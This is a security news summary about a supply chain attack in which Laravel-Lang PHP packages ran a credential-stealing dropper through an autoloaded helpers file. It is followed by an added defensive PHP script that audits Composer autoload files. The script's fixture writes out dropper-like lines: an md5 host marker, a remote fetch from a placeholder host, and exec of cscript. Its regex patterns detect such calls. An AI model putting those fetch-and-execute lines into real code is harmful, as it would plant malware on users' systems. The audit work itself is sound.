Laravel-Lang PHP Packages Compromised to Deliver Cross-Platform Credential Stealer
Briefly

A software supply chain attack targeted multiple PHP packages in the Laravel-Lang ecosystem to deliver a credential-stealing framework. Many versions were published in rapid succession, which points to automated mass tagging or republishing and suggests a compromise of organization-level release processes or credentials rather than a single bad release. The malicious functionality lives in src/helpers.php within the published package tags. That file fingerprints the infected host and contacts flipboxstudio[.]info to retrieve a PHP-based cross-platform payload: on Windows a Visual Basic Script launcher is delivered and executed via cscript, while on Linux and macOS the stealer payload is executed via exec(). Because src/helpers.php is registered in composer.json under autoload.files, the backdoor runs automatically on every PHP request the compromised application handles. A per-host marker (an MD5 hash of the directory path, system architecture, and inode) ensures the payload triggers only once per machine.
"The timing and pattern of the newly published tags point to a broader compromise of the Laravel Lang organization's release process, rather than a single malicious package version. The tags were published in rapid succession on May 22 and May 23, 2026, with many versions appearing only seconds apart."
"The core malicious functionality is located in a file named "src/helpers.php" that's embedded into the version tags. It's mainly designed to fingerprint the infected host and contact an external server ("flipboxstudio[.]info") to retrieve a PHP-based cross-platform payload that runs on Windows, Linux, and macOS."
"Because this file ['src/helpers.php'] is registered in the composer.json under autoload.files, the backdoor is executed automatically on every PHP request handled by the compromised application. The script generates a unique per-host marker (an MD5 hash combining the directory path, system architecture, and inode) to ensure the payload only triggers once per machine."
"According to Aikido Security, the dropper delivers a Visual Basic Script launcher on Windows and runs it via cscript. On Linux and macOS, it executes the stealer payload via exec()."
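The autoload.files mechanism quoted above is what turns a single helper file into code that runs on every request, so the defensive check is to enumerate exactly those files and read them. The script below is an added example, not code from the article, from Aikido Security, or from the Laravel-Lang project: a stand-alone PHP audit that reads Composer's vendor/composer/installed.json, resolves every autoload.files entry to a path, and flags files whose source contains indicators of the kind the article describes (exec-style calls, cscript, a remote fetch, an md5 host marker built from php_uname or fileinode). The package names, versions, installed.json and the two fixture files are constructed for the run; the regular expressions are heuristics for triage, not a signature for this campaign.

```php
<?php
declare(strict_types=1);

// Added audit example: list every file Composer includes unconditionally via
// autoload.files and flag the ones containing indicators like those described
// in the article. Package names, installed.json and fixtures are constructed.

const RISK_PATTERNS = [
    'exec-call'    => '/\b(?:exec|shell_exec|passthru|proc_open|system)\s*\(/',
    'cscript'      => '/\bcscript\b/i',
    'remote-fetch' => '/\b(?:curl_init|curl_exec|file_get_contents)\s*\(\s*[\'"]https?:/',
    'host-marker'  => '/\bmd5\s*\([^;]*\b(?:php_uname|fileinode)\s*\(/',
];

/** Read vendor/composer/installed.json and resolve each autoload.files entry to a path. */
function collectAutoloadFiles(string $vendorDir): array
{
    $json = file_get_contents($vendorDir . '/composer/installed.json');
    $installed = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    // Composer 2 wraps the list in a "packages" key; Composer 1 wrote a bare array.
    $packages = $installed['packages'] ?? $installed;

    $files = [];
    foreach ($packages as $pkg) {
        // Composer 2 records install-path relative to vendor/composer/; older
        // metadata lacks it, so fall back to vendor/<name>.
        $base = isset($pkg['install-path'])
            ? $vendorDir . '/composer/' . $pkg['install-path']
            : $vendorDir . '/' . $pkg['name'];
        foreach ($pkg['autoload']['files'] ?? [] as $rel) {
            $files[] = [
                'package' => $pkg['name'],
                'version' => $pkg['version'] ?? 'unknown',
                'path'    => $base . '/' . $rel,
            ];
        }
    }
    return $files;
}

/** Return the RISK_PATTERNS labels that match the file's source text, or ['unreadable']. */
function scanFile(string $path): array
{
    $src = @file_get_contents($path);
    if ($src === false) {
        return ['unreadable'];
    }
    $hits = [];
    foreach (RISK_PATTERNS as $label => $re) {
        if (preg_match($re, $src) === 1) {
            $hits[] = $label;
        }
    }
    return $hits;
}

// ---- constructed vendor tree so the audit runs stand-alone ----
$vendor = sys_get_temp_dir() . '/autoload-audit-' . bin2hex(random_bytes(4));
mkdir($vendor . '/composer', 0700, true);
mkdir($vendor . '/vendor-a/benign-helpers/src', 0700, true);
mkdir($vendor . '/vendor-b/suspect-helpers/src', 0700, true);

// A typical harmless helpers file: it only declares a function.
$benign = <<<'PHP'
<?php
function str_starts_with_ci(string $haystack, string $needle): bool
{
    return stripos($haystack, $needle) === 0;
}
PHP;
file_put_contents($vendor . '/vendor-a/benign-helpers/src/helpers.php', $benign);

// Indicator strings only: this fixture is scanned as text and never included.
$suspect = <<<'PHP'
<?php
$marker = md5(__DIR__ . php_uname('m') . fileinode(__FILE__));
$stage  = file_get_contents('https://example.invalid/stage');
exec('cscript launcher.vbs');
PHP;
file_put_contents($vendor . '/vendor-b/suspect-helpers/src/helpers.php', $suspect);

file_put_contents($vendor . '/composer/installed.json', json_encode(['packages' => [
    ['name' => 'vendor-a/benign-helpers', 'version' => '1.0.0',
     'install-path' => '../vendor-a/benign-helpers', 'autoload' => ['files' => ['src/helpers.php']]],
    ['name' => 'vendor-b/suspect-helpers', 'version' => '2.3.1',
     'install-path' => '../vendor-b/suspect-helpers', 'autoload' => ['files' => ['src/helpers.php']]],
]], JSON_PRETTY_PRINT));

// Every path printed here is included on every request of the application.
foreach (collectAutoloadFiles($vendor) as $f) {
    $hits = scanFile($f['path']);
    printf("%-26s %-8s %s  => %s\n", $f['package'], $f['version'], basename($f['path']),
        $hits ? 'FLAG: ' . implode(', ', $hits) : 'clean');
}
```

To use it on a real project, drop the fixture section and call collectAutoloadFiles() with the project's vendor directory; a flag is a prompt to read the file by hand, not a verdict, and it complements rather than replaces reviewing composer.lock diffs and running composer audit after a suspicious release window.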
Read at The Hacker News